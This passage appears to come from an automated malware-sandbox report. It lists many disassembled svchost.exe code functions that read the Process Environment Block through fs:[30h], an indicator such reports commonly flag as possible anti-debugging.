                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h] 2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h] 2_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h] 2_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h] 2_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h] 2_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h] 2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h] 2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h] 2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h] 2_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h] 2_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h] 2_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h] 2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h] 2_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h] 2_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h] 2_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h] 2_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h] 2_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h] 2_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h] 2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h] 2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h] 2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h] 2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h] 2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h] 2_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h] 2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h] 2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h] 2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h] 2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h] 2_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h]2_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD678E mov eax, dword ptr fs:[00000030h]2_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE47A0 mov eax, dword ptr fs:[00000030h]2_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE75D mov eax, dword ptr fs:[00000030h]2_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
